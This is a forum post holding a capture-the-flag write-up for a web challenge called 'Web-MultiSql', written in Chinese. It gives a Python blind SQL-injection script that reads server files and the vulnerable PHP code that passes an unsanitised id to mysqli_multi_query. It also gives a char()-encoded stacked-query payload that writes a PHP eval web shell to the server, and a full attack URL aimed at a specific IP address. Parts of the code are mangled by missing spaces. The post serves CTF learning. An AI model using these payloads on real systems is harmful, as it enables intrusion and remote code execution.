[Writeup] Web-MultiSql

[复制链接]
查看7165 | 回复0 | 2020-10-7 18:07:09 | 显示全部楼层 |阅读模式
页面存在注入点
Load_file()读文件/var/www/html/user/user.php(路径16进制转码)
import requests
importmultiprocessing
import time
def runn(a,b):
  r= requests.session()
  headers ={'cookie':'PHPSESSID=r5i6l86as0l78pn3qttjp9b8v3'}
  out=''
  for i in range(a,b):
    for j in range(32,128):
     #/var/www/html//bwvs_config/sys_config.php

      respond = r.get(url,headers =headers).text
      if 'admin' in respond:
        out+=chr(j)
        #print(url)
        print(out)

if __name__ =='__main__':

    runn(0,10)

/var/www/html/user/user.php内容如下:
<?
phpinclude_once('../bwvs_config/sys_config.php');
  if (isset($_SESSION['user_name']))
  {
    include_once('../header.php');
    if (!isset($SESSION['user_id']))
    {
      $sql = "SELECT * FROMdwvs_user_message WHERE DWVS_user_name="."'{$_SESSION['user_name']}'";
      $data = mysqli_query($connect,$sql) ordie('Mysql Error!!');
      $result = mysqli_fetch_array($data);
      $_SESSION['user_id'] =$result['DWVS_user_id'];}
      $html_avatar =htmlspecialchars($_SESSION['user_favicon']);
      if(isset($_GET['id']))
      {
        $id=waf($_GET['id']);
        $sql = "SELECT * FROMdwvs_user_message WHERE DWVS_user_id =".$id;
        $data = mysqli_multi_query($connect,$sql) or die();
        $result =mysqli_store_result($connect);
        $row = mysqli_fetch_row($result);
        echo'<h1>user_id:'.$row[0]."</h1><br><h2>user_name:".$row[1]."</h2><br><h3>".$row[4]."</h3>";
        mysqli_free_result($result);die();
      }
     mysqli_close($connect);
mysqli_multi_query()函数执行多条sql语句
使用char()绕过
strs='''select"<?php eval($_POST['a']);echo 'aaaaaaa'; ?>" into outfile'/var/www/html/favicon/TZDX.php';'''
print(strs)
len_str=len(strs)
for i inrange(0,len_str):
ifi == 0:
print('char(%s'%ord(strs),end="")
else:
print(',%s'%ord(strs),end="")
print(')')
注意POST['a']  a要用引号,不然连不上。

payload
set@sql=char(115,101,108,101,99,116,32,34,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,39,97,39,93,41,59,101,99,104,111,32,39,97,97,97,97,97,97,97,39,59,32,63,62,34,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,84,90,68,88,46,112,104,112,39,59);preparequery from @sql;execute query;
完整的URL=http://62.234.99.204:1005/user/user.php?id=790;set@sql=char(115,101,108,101,99,116,32,34,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,39,97,39,93,41,59,101,99,104,111,32,39,97,97,97,97,97,97,97,39,59,32,63,62,34,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,84,90,68,88,46,112,104,112,39,59);preparequery from @sql;execute query;

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

2

主题

3

帖子

42

积分

打谱CTF

Rank: 3Rank: 3

积分
42